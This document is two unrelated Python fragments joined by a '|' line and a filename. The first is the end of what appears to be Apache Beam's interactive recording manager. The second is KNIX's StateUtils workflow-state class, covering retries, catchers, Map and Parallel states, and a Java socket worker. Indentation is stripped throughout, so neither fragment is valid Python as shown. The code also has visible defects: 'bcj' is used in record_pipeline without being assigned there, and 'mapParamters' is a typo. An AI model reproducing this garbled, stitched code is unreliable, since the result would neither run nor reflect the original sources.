cache_manager = ie.current_env().get_cache_manager(self.user_pipeline)
capture_size = getattr(cache_manager, 'capture_size', 0)
descriptions = [r.describe() for r in self._recordings]
size = sum(d['size'] for d in descriptions) + capture_size
start = self._start_time_sec
bcj = ie.current_env().get_background_caching_job(self.user_pipeline)
if bcj:
state = bcj.state
else:
state = PipelineState.STOPPED
return {
'size': size,
'start': start,
'state': state,
'pipeline_var': self.pipeline_var
}
def record_pipeline(self):
# type: () -> bool
"""Starts a background caching job for this RecordingManager's pipeline."""
runner = self.user_pipeline.runner
if isinstance(runner, ir.InteractiveRunner):
runner = runner._underlying_runner
# Make sure that sources without a user reference are still cached.
ie.current_env().add_user_pipeline(self.user_pipeline)
pi.watch_sources(self.user_pipeline)
# Attempt to run background caching job to record any sources.
if ie.current_env().is_in_ipython:
warnings.filterwarnings(
'ignore',
'options is deprecated since First stable release. References to '
'<pipeline>.options will not be supported',
category=DeprecationWarning)
if bcj.attempt_to_run_background_caching_job(
runner,
self.user_pipeline,
options=self.user_pipeline.options,
limiters=self._test_limiters):
self._start_time_sec = time.time()
return True
return False
def record(self, pcolls, max_n, max_duration):
# type: (List[beam.pvalue.PCollection], int, Union[int,str]) -> Recording
"""Records the given PCollections."""
# Assert that all PCollection come from the same user_pipeline.
for pcoll in pcolls:
assert pcoll.pipeline is self.user_pipeline, (
'{} belongs to a different user-defined pipeline ({}) than that of'
' other PCollections ({}).'.format(
pcoll, pcoll.pipeline, self.user_pipeline))
if isinstance(max_duration, str) and max_duration != 'inf':
max_duration_secs = pd.to_timedelta(max_duration).total_seconds()
else:
max_duration_secs = max_duration
# Make sure that all PCollections to be shown are watched. If a PCollection
# has not been watched, make up a variable name for that PCollection and
# watch it. No validation is needed here because the watch logic can handle
# arbitrary variables.
self._watch(pcolls)
pipeline_instrument = pi.PipelineInstrument(self.user_pipeline)
self.record_pipeline()
# Get the subset of computed PCollections. These do not to be recomputed.
computed_pcolls = set(
pcoll for pcoll in pcolls
if pcoll in ie.current_env().computed_pcollections)
# Start a pipeline fragment to start computing the PCollections.
uncomputed_pcolls = set(pcolls).difference(computed_pcolls)
if uncomputed_pcolls:
# Clear the cache of the given uncomputed PCollections because they are
# incomplete.
self._clear(pipeline_instrument)
warnings.filterwarnings(
'ignore',
'options is deprecated since First stable release. References to '
'<pipeline>.options will not be supported',
category=DeprecationWarning)
pf.PipelineFragment(list(uncomputed_pcolls),
self.user_pipeline.options).run()
result = ie.current_env().pipeline_result(self.user_pipeline)
else:
result = None
recording = Recording(
self.user_pipeline,
pcolls,
result,
pipeline_instrument,
max_n,
max_duration_secs)
self._recordings.add(recording)
return recording
|
StateUtils.py
|
# Copyright 2020 The KNIX Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import ast
import copy
from datetime import datetime
import json
import socket
import time
import threading
import anytree
from thriftpy2.transport import TFramedTransportFactory, TServerSocket
from thriftpy2.protocol import TCompactProtocolFactory
from thriftpy2.server import TSimpleServer
from thriftpy2.thrift import TProcessor
from ujsonpath import parse, tokenize
import py3utils
from DataLayerClient import DataLayerClient
class StateUtils:
defaultStateType = 'Task_SAND'
taskStateType = 'Task'
choiceStateType = 'Choice'
passStateType = 'Pass'
succeedStateType = 'Succeed'
failStateType = 'Fail'
waitStateType = 'Wait'
parallelStateType = 'Parallel'
mapStateType = 'Map'
mapFunctionOutput = {}
def __init__(self, functionstatetype=defaultStateType, functionstatename='', functionstateinfo='{}', functionruntime="", logger=None, workflowid=None, sandboxid=None, functiontopic=None, datalayer=None, storage_userid=None, internal_endpoint=None):
self.operators = ['And', 'BooleanEquals', 'Not', 'NumericEquals', 'NumericGreaterThan', 'NumericGreaterThanEquals',\
'NumericLessThan', 'NumericLessThanEquals', 'Or', 'StringEquals', 'StringGreaterThan',\
'StringGreaterThanEquals', 'StringLessThan', 'StringLessThanEquals', 'TimestampEquals', 'TimestampGreaterThan',\
'TimestampGreaterThanEquals', 'TimestampLessThan', 'TimestampLessThanEquals']
self.operators_python = ['and', '==', 'not', '==', '>', '>=', '<', '<=', 'or', '==', '>', '>=', '<', '<=', '==', '>', '>=', '<', '<=']
self.operators_set = set(self.operators)
self.asl_errors = ("States.ALL", "States.Timeout", "States.TaskFailed", "States.Permissions", "States.ResultPathMatchFailure", "States.BranchFailed", "States.NoChoiceMatched")
self.nodelist = []
self.parsed_trees = []
self.default_next_choice = []
self.input_path_dict = {}
self.items_path_dict = {}
self.result_path_dict = {}
self.output_path_dict = {}
self.parameters_dict = {}
self.functionstatetype = functionstatetype
self.functionstatename = functionstatename
self.functionstateinfo = functionstateinfo
self.functiontopic = functiontopic
self._datalayer = datalayer
self._storage_userid = storage_userid
self._internal_endpoint = internal_endpoint
self._function_runtime = functionruntime
if self._function_runtime == "java":
# if java, this is the address we'll send requests to be handled
self._java_handler_address = "/tmp/java_handler_" + self.functionstatename + ".uds"
self.parsedfunctionstateinfo = {}
self.workflowid = workflowid
self.sandboxid = sandboxid
self.choiceNext = ''
self.mapStateCounter = 0
self.evaluateCounter = 0
self.catcher_list = []
self.retry_list = []
self._logger = logger
self.parse_function_state_info()
self.function_output_batch_list = []
self.tobeProcessedlater = []
self.outputMapStatebatch = []
self.mapPartialResult = {}
def call_counter(func):
def helper(*args, **kwargs):
helper.calls += 1
return func(*args, **kwargs)
helper.calls = 0
helper.__name__= func.__name__
return helper
# find target next for error in catcher list
def find_cat_data(self, err, cat_list):
cat_result = "$" # default
cat_next = [] # default
for cat in cat_list:
if "ErrorEquals" in cat and (str(err) in cat["ErrorEquals"] or err.__class__.__name__ in cat["ErrorEquals"]):
cat_next = cat['Next']
if "ResultPath" in cat:
cat_result = cat['ResultPath']
return cat_next, cat_result
def find_ret_data(self, err, ret_list):
ret_max_attempts = 1 # default
ret_interval_seconds = 1 # default
ret_backoff_rate = 1.0 # default
for ret in ret_list:
if err in ret['ErrorEquals'] or err.__class__.__name__ in ret['ErrorEquals']:
if "MaxAttempts" in list(ret.keys()):
ret_max_attempts = ret['MaxAttempts']
if "IntervalSeconds" in list(ret.keys()):
ret_interval_seconds = ret['IntervalSeconds']
if "BackoffRate" in list(ret.keys()):
ret_backoff_rate = ret['BackoffRate']
return ret_max_attempts, ret_interval_seconds, ret_backoff_rate
def isMapState(self):
return self.functionstatetype == StateUtils.mapStateType
def isTaskState(self):
return self.functionstatetype == StateUtils.taskStateType or self.functionstatetype == StateUtils.defaultStateType
def applyParameters(self, raw_state_input):
#2c. Apply Parameters, if available and applicable (The Parameters field is used in Map to select values in the input)
# in = raw_state_input
# if Parameters:
# in = raw_state_input[ItemsPath]
#
try:
function_input = raw_state_input
self._logger.debug("inside applyParameters: " + str(self.parameters_dict) + ", raw_state_input: " + str(raw_state_input))
if self.parameters_dict:
function_input = self.process_parameters(self.parameters_dict, function_input)
return function_input
except Exception:
raise Exception("Parameters processing exception")
def applyItemsPath(self, raw_state_input):
#2a. Apply ItemsPath, if available and applicable (The ItemsPath field is used in Map to select an array in the input)
# in = raw_state_input
# if ItemsPath:
# in = raw_state_input[ItemsPath]
#
try:
function_input = raw_state_input
if self.items_path_dict and 'ItemsPath' in self.items_path_dict:
function_input = self.process_items_path(self.items_path_dict, function_input)
return function_input
except Exception:
raise Exception("Items path processing exception")
def applyInputPath(self, raw_state_input):
#2. Apply InputPath, if available (Extract function_input from raw_state_input)
# in = raw_state_input
# if InputPath:
# in = raw_state_input[InputPath]
#
try:
function_input = raw_state_input
if self.input_path_dict and 'InputPath' in self.input_path_dict:
function_input = self.process_input_path(self.input_path_dict, function_input)
return function_input
except Exception:
raise Exception("Input path processing exception")
# send a request to the java worker and get the result
def _send_java_request(self, java_input, java_output, api_server, server_socket):
# get a connection to the java worker
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
# send the request
max_num_tries = 10
num_tries = 0
trying = True
has_error = False
while trying:
try:
sock.connect(self._java_handler_address)
trying = False
except socket.error as msg:
num_tries += 1
if num_tries > max_num_tries:
self._logger.debug("cannot open connection to java worker: %s", msg)
trying = False
has_error = True
else:
self._logger.debug("will retry connection to java worker...")
time.sleep(0.05*num_tries)
if not has_error:
try:
sock.sendall(java_input.encode())
sock.shutdown(socket.SHUT_WR)
# receive the response
chunks = []
while True:
data = sock.recv(4096)
if not data:
sock.close()
break
chunks.append(data.decode())
output_data = "".join(chunks)
self._logger.debug("received output_data: " + output_data)
output_data = json.loads(output_data)
if not output_data["hasError"]:
java_output["functionResult"] = output_data["functionResult"]
java_output["hasError"] = False
java_output["errorType"] = ""
java_output["errorTrace"] = ""
else:
java_output["hasError"] = output_data["hasError"]
java_output["errorType"] = output_data["errorType"]
java_output["errorTrace"] = output_data["errorTrace"]
# close the api server in the main thread, so that we can continue with publishing the output
api_server.close()
server_socket.close()
except socket.error as msg:
self._logger.debug("cannot send request to java worker: %s", msg)
#os._exit(1)
def _exec_function(self, runtime, exec_arguments, sapi):
if runtime == "python 3.6":
func = exec_arguments["function"]
args = exec_arguments["function_input"]
function_output = func(args, sapi)
elif runtime == "java":
# open the API server for this request
api_uds = exec_arguments["api_uds"]
thriftAPIService = exec_arguments["thriftAPIService"]
java_input = exec_arguments["function_input"]
processor = TProcessor(thriftAPIService, sapi)
server_socket = TServerSocket(unix_socket=api_uds)
# no need for any other type of server; there will only be a single client: the java function instance
api_server = TSimpleServer(processor, server_socket,
iprot_factory=TCompactProtocolFactory(),
itrans_factory=TFramedTransportFactory())
self._logger.debug("API server at: " + api_uds)
self._logger.debug("starting with java_input: " + java_input)
# access to the output for the thread via an object
java_output = {}
# send it to the java worker in a thread
# (thread has access to api_server object and server_socket to stop it)
# (thread has also access to the output to set it in the main thread of execution)
try:
t = threading.Thread(target=self._send_java_request, args=(java_input, java_output, api_server, server_socket,))
t.start()
except Exception as exc:
pass
# meanwhile, the main thread listens and serves API requests
# when the execution is finished, the api server will be stopped
try:
self._logger.debug("API server serving...")
api_server.serve()
except Exception as exc:
#raise exc
pass
# when the java worker function returns, it stops the API server and sets the output that was produced
# get the output
has_error = java_output["hasError"]
error_type = java_output["errorType"]
error_trace = java_output["errorTrace"]
if not has_error:
function_output = java_output["functionResult"]
else:
raise Exception(error_type)
return function_output
#@retry(ZeroDivisionError, tries=10, delay=1) # ToDo: parse parameters of of retryers and catchers
#@retry([x[0] for x in self.asl_errors], tries=3, delay=2) # ToDo: parse parameters of of retryers and catchers
#@retry("States.ALL", tries=3, delay=2)
def exec_function_catch_retry(self, runtime, exec_arguments, sapi):
retryer = self.retry_list
catcher = self.catcher_list
ret_error_list = []
ret_interval_seconds = 0
ret_backoff_rate = 0
ret_max_attempts = 0
cat_next = ""
ret_value = []
for ret in retryer:
ret_error_list = ret['ErrorEquals']
self._logger.debug("[StateUtils] found a ASL workflow retryer, retry for: " + str(ret_error_list))
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as exc:
self._logger.debug("[StateUtils] retryer just caught an error: " + ", " + str(exc) + ", " + str(exc.__class__.__name__) + ", " + str(retryer))
ret_max_attempts, ret_interval_seconds, ret_backoff_rate = self.find_ret_data(exc, retryer) # get the retry data for this error
delay = int(ret_interval_seconds)
max_attempts = int(ret_max_attempts)
backoff_rate = float(ret_backoff_rate)
# start retrying on this error
while max_attempts:
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as e_retry:
if (any(str(e_retry) in s0 for s0 in ret_error_list) or any(e_retry.__class__.__name__ in s1 for s1 in ret_error_list)):
self._logger.debug("[StateUtils] MFn ASL retryer just caught an error:" + str(e_retry) + str(retryer))
self._logger.debug("[StateUtils] retrying for Error: " + str(e_retry) + ", remaining attempts: " + str(max_attempts))
max_attempts -= 1
if not max_attempts:
ret_value = {"Error": str(exc), "Cause": "Error not caught by MFn ASL Workflow retryer"}
self._logger.error("[StateUtils] Error not caught by MFn ASL Workflow retryer!")
return ret_value
#raise # max retries have been reached
self._logger.warning('%s, retrying in %s seconds... ' % (e_retry, str(delay)))
time.sleep(delay)
delay *= backoff_rate
if catcher:
self._logger.debug("[StateUtils] found a ASL workflow catcher")
# there was no retry information provided for this function, proceed with catch
ret_value = {"Error": "Catcher", "Cause": "error caught by MFn ASL Workflow catcher"}
try:
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
except Exception as exc:
exc_msg = str(exc)
self._logger.error("[StateUtils] catcher just caught an error: " + exc_msg + " " + str(catcher))
cat_next, cat_result = self.find_cat_data(exc, catcher)
if cat_next != []:
self._logger.error("[StateUtils] matching catch list entry target and result for this error: " + str(cat_next) + " " + str(cat_result))
self.result_path_dict['ResultPath'] = cat_result
ret_value = {"Error": exc_msg, "Cause": "this error caught by MFn ASL Workflow catcher!"}
if runtime == "java":
# do an extra serialization, because we were expecting a java output,
# but got a python object
val = {}
val["value"] = exc_msg
exc_msg = json.dumps(val)
sapi.add_dynamic_next(cat_next, exc_msg)
return ret_value
else: # no catcher could be found for this error
self._logger.error("[StateUtils] Error not caught by MFn ASL Workflow catcher!")
raise exc
else: # neither catcher nor retryers are set
ret_value = self._exec_function(runtime, exec_arguments, sapi)
return ret_value
def getChoiceResults(self, value_output):
choice_next_list = []
#self._logger.debug("[StateUtils] getChoiceResults Inputs: " + str(self.choiceNext) + str(self.functionstatetype))
if self.functionstatetype == self.choiceStateType and self.choiceNext != '':
choice_next_list.append({"next": self.choiceNext, "value": value_output})
return choice_next_list
def evaluateChoiceConditions(self, function_input):
self.choiceNext = ''
self.choiceNext = self.evaluateNextState(function_input)
self._logger.debug("[StateUtils] Evaluated Choice condition: " + str(self.choiceNext))
def evaluateMapState(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
if "MaxConcurrency" in self.parsedfunctionstateinfo:
maxConcurrency = self.parsedfunctionstateinfo["MaxConcurrency"]
else:
maxConcurrency = 0
self.parsedfunctionstateinfo["MaxConcurrency"] = maxConcurrency
if "Parameters" in self.parsedfunctionstateinfo:
mapParamters = self.parsedfunctionstateinfo["Parameters"]
else:
mapParameters = {}
self._logger.debug("[StateUtils] evaluateMapState, maxConcurrency: " + str(maxConcurrency))
self._logger.debug("[StateUtils] evaluateMapState metadata: " + str(metadata))
counter_name_topic = self.sandboxid + "-" + self.workflowid + "-" + self.functionstatename
total_branch_count = len(function_input) # all branches executed concurrently
klist = [total_branch_count]
self.parsedfunctionstateinfo["BranchCount"] = int(total_branch_count) # overwrite parsed BranchCount with new value
self._logger.debug("[StateUtils] evaluateMapState, total_branch_count: " + str(total_branch_count))
# prepare counter metadata
counter_metadata = {}
counter_metadata["__state_action"] = "post_map_processing"
counter_metadata["__async_execution"] = metadata["__async_execution"]
workflow_instance_metadata_storage_key = name_prefix + "_workflow_metadata"
counter_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_metadata["Klist"] = klist
counter_metadata["TotalBranches"] = total_branch_count
counter_metadata["ExecutionId"] = key
counter_metadata["FunctionTopic"] = self.functiontopic
counter_metadata["Endpoint"] = self._internal_endpoint
iterator = self.parsedfunctionstateinfo["Iterator"]
counter_name_trigger_metadata = {"k-list": klist, "total-branches": total_branch_count}
# dynamic values used for generation of branches
counter_name_key = key
branch_out_keys = []
for i in range(total_branch_count):
branch_out_key = key + "-branch-" + str(i+1)
branch_out_keys.append(branch_out_key)
# prepare counter name value metadata
counter_name_value_metadata = copy.deepcopy(metadata)
counter_name_value_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_name_value_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_name_value_metadata["__state_action"] = "post_map_processing"
counter_name_value_metadata["state_counter"] = metadata["state_counter"]
self._logger.debug("[StateUtils] evaluateMapState, metadata[state_counter]: " + str(metadata["state_counter"]))
self.mapStateCounter = int(metadata["state_counter"])
counter_name_value = {"__mfnmetadata": counter_name_value_metadata, "__mfnuserdata": '{}'}
CounterName = json.dumps([str(counter_name_topic), str(counter_name_key), counter_name_trigger_metadata, counter_name_value])
# prepare mapInfo metadata
workflow_instance_outputkeys_set_key = key +"_"+ self.functionstatename + "_outputkeys_set"
mapInfo = {}
mapInfo["CounterTopicName"] = counter_name_topic
mapInfo["CounterNameKey"] = counter_name_key
mapInfo["TriggerMetadata"] = counter_name_trigger_metadata
mapInfo["CounterNameValueMetadata"] = counter_name_value_metadata
mapInfo["BranchOutputKeys"] = branch_out_keys
mapInfo["CounterName"] = CounterName
mapInfo["MaxConcurrency"] = maxConcurrency
mapInfo["BranchOutputKeysSetKey"] = workflow_instance_outputkeys_set_key
mapInfo["Klist"] = klist
mapInfo_key = self.functionstatename + "_" + key + "_map_info"
metadata[mapInfo_key] = mapInfo
# create counter for Map equivalent Parallel state
assert py3utils.is_string(CounterName)
counterName = str(mapInfo["CounterName"])
counter_metadata_key_name = counterName + "_metadata"
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# create a triggerable counter to start the post-parallel when parallel state finishes
dlc.createCounter(CounterName, 0, tableName=dlc.countertriggerstable)
dlc.put(counter_metadata_key_name, json.dumps(counter_metadata), tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception in creating counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
assert py3utils.is_string(workflow_instance_metadata_storage_key)
self._logger.debug("[StateUtils] full_metadata_encoded put key: " + str(workflow_instance_metadata_storage_key))
sapi.put(workflow_instance_metadata_storage_key, json.dumps(metadata))
# Now provide each branch with its own input
branch = self.parsedfunctionstateinfo["Iterator"] # this is just onee set
# launch a branch for each input element
startat = str(branch["StartAt"])
for i in range(len(function_input)):
sapi.add_dynamic_next(startat, function_input[i]) # Alias for add_workflow_next(self, next, value)
sapi.put(name_prefix + "_" + "mapStateInputValue", str(function_input[i]))
sapi.put(name_prefix + "_" + "mapStateInputIndex", str(i))
self._logger.debug("\t Map State StartAt:" + startat)
self._logger.debug("\t Map State input:" + str(function_input[i]))
return function_input, metadata
def evaluatePostMap(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
# function is triggered by post-commit hook with metadata containing information about state results in buckets.
# It collects these results and returns metadata and post_map_output_results
action = metadata["__state_action"]
assert action == "post_map_processing"
counterValue = function_input["CounterValue"]
state_counter = 0
if "state_counter" in metadata:
state_counter = metadata["state_counter"]
self._logger.debug("\t metadata:" + json.dumps(metadata))
workflow_instance_metadata_storage_key = str(function_input["WorkflowInstanceMetadataStorageKey"])
assert py3utils.is_string(workflow_instance_metadata_storage_key)
full_metadata_encoded = sapi.get(workflow_instance_metadata_storage_key)
self._logger.debug("[StateUtils] full_metadata_encoded get: " + str(full_metadata_encoded))
full_metadata = json.loads(full_metadata_encoded)
full_metadata["state_counter"] = state_counter
mapInfoKey = self.functionstatename + "_" + key + "_map_info"
mapInfo = full_metadata[mapInfoKey]
branchOutputKeysSetKey = str(mapInfo["BranchOutputKeysSetKey"])
branchOutputKeysSet = sapi.retrieveSet(branchOutputKeysSetKey)
self._logger.debug("\t branchOutputKeysSet: " + str(branchOutputKeysSet))
if not branchOutputKeysSet:
self._logger.error("[StateUtils] branchOutputKeysSet is empty")
raise Exception("[StateUtils] branchOutputKeysSet is empty")
klist = mapInfo["Klist"]
#self._logger.debug("\t action: " + action)
#self._logger.debug("\t counterValue:" + str(counterValue))
#self._logger.debug("\t WorkflowInstanceMetadataStorageKey:" + metadata["WorkflowInstanceMetadataStorageKey"])
#self._logger.debug("\t full_metadata:" + full_metadata_encoded)
#self._logger.debug("\t mapInfoKey: " + mapInfoKey)
#self._logger.debug("\t mapInfo:" + json.dumps(mapInfo))
#self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
#self._logger.debug("\t branchOutputKeysSet:" + str(branchOutputKeysSet))
#self._logger.debug("\t klist:" + str(klist))
NumBranchesFinished = abs(counterValue)
self._logger.debug("\t NumBranchesFinished:" + str(NumBranchesFinished))
do_cleanup = False
if klist[-1] == NumBranchesFinished:
do_cleanup = True
self._logger.debug("\t do_cleanup:" + str(do_cleanup))
counterName = str(mapInfo["CounterName"])
counter_metadata_key_name = counterName + "_metadata"
assert py3utils.is_string(counterName)
if do_cleanup:
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# done with the triggerable counter
dlc.deleteCounter(counterName, tableName=dlc.countertriggerstable)
dlc.delete(counter_metadata_key_name, tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception deleting counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
post_map_output_values = []
self._logger.debug("\t mapInfo_BranchOutputKeys:" + str(mapInfo["BranchOutputKeys"]))
self._logger.debug("\t mapInfo_BranchOutputKeys length: " + str(len(mapInfo["BranchOutputKeys"])))
for outputkey in mapInfo["BranchOutputKeys"]:
outputkey = str(outputkey)
if outputkey in branchOutputKeysSet: # mapInfo["BranchOutputKeys"]:
self._logger.debug("\t BranchOutputKey:" + outputkey)
while sapi.get(outputkey) == "":
time.sleep(0.1) # wait until value is available
branchOutput = sapi.get(outputkey)
branchOutput_decoded = json.loads(branchOutput)
self._logger.debug("\t branchOutput(type):" + str(type(branchOutput)))
self._logger.debug("\t branchOutput:" + branchOutput)
self._logger.debug("\t branchOutput_decoded(type):" + str(type(branchOutput_decoded)))
self._logger.debug("\t branchOutput_decoded:" + str(branchOutput_decoded))
post_map_output_values = post_map_output_values + [branchOutput_decoded]
if do_cleanup:
sapi.delete(outputkey) # cleanup the key from data layer
self._logger.debug("\t cleaned output key:" + outputkey)
else:
post_map_output_values = post_map_output_values + [None]
self._logger.debug("\t this_BranchOutputKeys is not contained: " + str(outputkey))
self._logger.debug("\t post_map_output_values:" + str(post_map_output_values))
while (sapi.get(name_prefix + "_" + "mapStatePartialResult")) == "":
time.sleep(0.1) # wait until value is available
mapStatePartialResult = ast.literal_eval(sapi.get(name_prefix + "_" + "mapStatePartialResult"))
mapStatePartialResult += post_map_output_values
sapi.put(name_prefix + "_" + "mapStatePartialResult", str(mapStatePartialResult))
# now apply ResultPath and OutputPath
if do_cleanup:
sapi.deleteSet(branchOutputKeysSetKey)
if ast.literal_eval(sapi.get(name_prefix + "_" + "mapInputCount")) == len(mapStatePartialResult):
# we are ready to publish but need to honour ResultPath and OutputPath
res_raw = ast.literal_eval(sapi.get(name_prefix + "_" +"mapStatePartialResult"))
# remove unwanted keys from input before publishing
function_input = {}
function_input_post_result = self.applyResultPath(function_input, res_raw)
function_input_post_output = self.applyResultPath(function_input_post_result, function_input_post_result)
if "Next" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["Next"]:
sapi.add_dynamic_next(self.parsedfunctionstateinfo["Next"], function_input_post_output )
if "End" in self.parsedfunctionstateinfo:
if self.parsedfunctionstateinfo["End"]:
sapi.add_dynamic_next("end", function_input_post_output)
sapi.delete(name_prefix + "_" + "mapInputCount")
sapi.delete(name_prefix + "_" + "mapStateInputIndex")
sapi.delete(name_prefix + "_" + "mapStateInputValue")
sapi.delete(name_prefix + "_" + "mapStatePartialResult")
sapi.delete(name_prefix + "_" + "tobeProcessedlater")
post_map_output_values = function_input_post_output
return post_map_output_values, full_metadata
def evaluateParallelState(self, function_input, key, metadata, sapi):
name_prefix = self.functiontopic + "_" + key
total_branch_count = self.parsedfunctionstateinfo["BranchCount"]
assert total_branch_count == len(self.parsedfunctionstateinfo["Branches"])
klist = []
if "WaitForNumBranches" in self.parsedfunctionstateinfo:
klist = self.parsedfunctionstateinfo["WaitForNumBranches"]
if not isinstance(klist, list):
self._logger.info("(StateUtils) WaitForNumBranches must be a sorted list with 1 or more integers")
raise Exception("(StateUtils) WaitForNumBranches must be a sorted list with 1 or more integers")
klist.sort()
for k in klist:
if not isinstance(k, int):
self._logger.info("(StateUtils) Values inside WaitForNumBranches must be integers")
raise Exception("(StateUtils) Values inside WaitForNumBranches must be integers")
if k > total_branch_count:
self._logger.info("(StateUtils) Values inside WaitForNumBranches list cannot be greater than the number of branches in the parallel state")
raise Exception("(StateUtils) Values inside WaitForNumBranches list cannot be greater than the number of branches in the parallel state")
else:
klist.append(total_branch_count)
counter_name_topic = self.sandboxid + "-" + self.workflowid + "-" + self.functionstatename
counter_name_trigger_metadata = {"k-list": klist, "total-branches": total_branch_count}
counter_name_key = key
# dynamic values
branch_out_keys = []
for i in range(total_branch_count):
branch_out_key = name_prefix + "_branch_" + str(i+1)
branch_out_keys.append(branch_out_key)
# prepare counter metadata
counter_metadata = {}
counter_metadata["__state_action"] = "post_parallel_processing"
counter_metadata["__async_execution"] = metadata["__async_execution"]
workflow_instance_metadata_storage_key = name_prefix + "_workflow_metadata"
counter_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_metadata["Klist"] = klist
counter_metadata["TotalBranches"] = total_branch_count
counter_metadata["ExecutionId"] = key
counter_metadata["FunctionTopic"] = self.functiontopic
counter_metadata["Endpoint"] = self._internal_endpoint
# prepare counter name value metadata
counter_name_value_metadata = copy.deepcopy(metadata)
counter_name_value_metadata["WorkflowInstanceMetadataStorageKey"] = workflow_instance_metadata_storage_key
counter_name_value_metadata["CounterValue"] = 0 # this should be updated by riak hook
counter_name_value_metadata["__state_action"] = "post_parallel_processing"
counter_name_value_metadata["state_counter"] = metadata["state_counter"]
counter_name_value = {"__mfnmetadata": counter_name_value_metadata, "__mfnuserdata": '{}'}
CounterName = json.dumps([str(counter_name_topic), str(counter_name_key), counter_name_trigger_metadata, counter_name_value])
#CounterName = name_prefix + "_counter"
counter_metadata_key_name = CounterName + "_metadata"
workflow_instance_outputkeys_set_key = name_prefix + "_outputkeys_set"
# prepare parallelInfo metadata
parallelInfo = {}
parallelInfo["CounterName"] = CounterName
parallelInfo["BranchOutputKeys"] = branch_out_keys
parallelInfo["BranchOutputKeysSetKey"] = workflow_instance_outputkeys_set_key
parallelInfo["Klist"] = klist
parallelInfo["TotalBranches"] = total_branch_count
parallelInfo["ExecutionId"] = key
parallelInfo["FunctionTopic"] = self.functiontopic
parallelInfo["Endpoint"] = self._internal_endpoint
parallelInfo_key = self.functionstatename + "_" + key + "_parallel_info"
metadata[parallelInfo_key] = parallelInfo
assert py3utils.is_string(CounterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# create a triggerable counter to start the post-parallel when parallel state finishes
dlc.createCounter(CounterName, 0, tableName=dlc.countertriggerstable)
dlc.put(counter_metadata_key_name, json.dumps(counter_metadata), tableName=dlc.countertriggersinfotable)
except Exception as exc:
self._logger.error("Exception in creating counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
assert py3utils.is_string(workflow_instance_metadata_storage_key)
sapi.put(workflow_instance_metadata_storage_key, json.dumps(metadata))
branches = self.parsedfunctionstateinfo["Branches"]
for branch in branches:
startat = str(branch["StartAt"])
sapi.add_dynamic_next(startat, function_input)
return function_input, metadata
def processBranchTerminalState(self, key, value_output, metadata, sapi):
if 'End' not in self.parsedfunctionstateinfo:
return
if self.parsedfunctionstateinfo["End"] and "ParentParallelInfo" in self.parsedfunctionstateinfo:
parentParallelInfo = self.parsedfunctionstateinfo["ParentParallelInfo"]
parallelName = parentParallelInfo["Name"]
branchCounter = parentParallelInfo["BranchCounter"]
#self._logger.debug("[StateUtils] processBranchTerminalState: ")
#self._logger.debug("\t ParentParallelInfo:" + json.dumps(parentParallelInfo))
#self._logger.debug("\t parallelName:" + parallelName)
#self._logger.debug("\t branchCounter: " + str(branchCounter))
#self._logger.debug("\t key:" + key)
#self._logger.debug("\t metadata:" + json.dumps(metadata))
#self._logger.debug("\t value_output(type):" + str(type(value_output)))
#self._logger.debug("\t value_output:" + value_output)
parallelInfoKey = parallelName + "_" + key + "_parallel_info"
#self._logger.debug("\t parallelInfoKey:" + parallelInfoKey)
if parallelInfoKey in metadata:
parallelInfo = metadata[parallelInfoKey]
counterName = str(parallelInfo["CounterName"])
branchOutputKeys = parallelInfo["BranchOutputKeys"]
branchOutputKey = str(branchOutputKeys[branchCounter-1])
branchOutputKeysSetKey = str(parallelInfo["BranchOutputKeysSetKey"])
#self._logger.debug("\t branchOutputKey:" + branchOutputKey)
#self._logger.debug("\t branchOutputKeysSetKey:" + branchOutputKeysSetKey)
assert py3utils.is_string(branchOutputKey)
sapi.put(branchOutputKey, value_output)
assert py3utils.is_string(branchOutputKeysSetKey)
sapi.addSetEntry(branchOutputKeysSetKey, branchOutputKey)
assert py3utils.is_string(counterName)
try:
dlc = DataLayerClient(locality=1, suid=self._storage_userid, is_wf_private=False, connect=self._datalayer)
# increment the triggerable counter
dlc.incrementCounter(counterName, 1, tableName=dlc.countertriggerstable)
except Exception as exc:
self._logger.error("Exception incrementing counter: " + str(exc))
self._logger.error(exc)
raise
finally:
dlc.shutdown()
else:
self._logger.error("[StateUtils] processBranchTerminalState Unable to find ParallelInfo")
raise Exception("processBranchTerminalState Unable to find ParallelInfo")
if self.parsedfunctionstateinfo["End"] and "ParentMapInfo" in self.parsedfunctionstateinfo:
parentMapInfo = self.parsedfunctionstateinfo["ParentMapInfo"]
mapName = parentMapInfo["Name"]
mapInfoKey = mapName + "_" + key + "_map_info"
branchCounter = parentMapInfo["BranchCounter"]
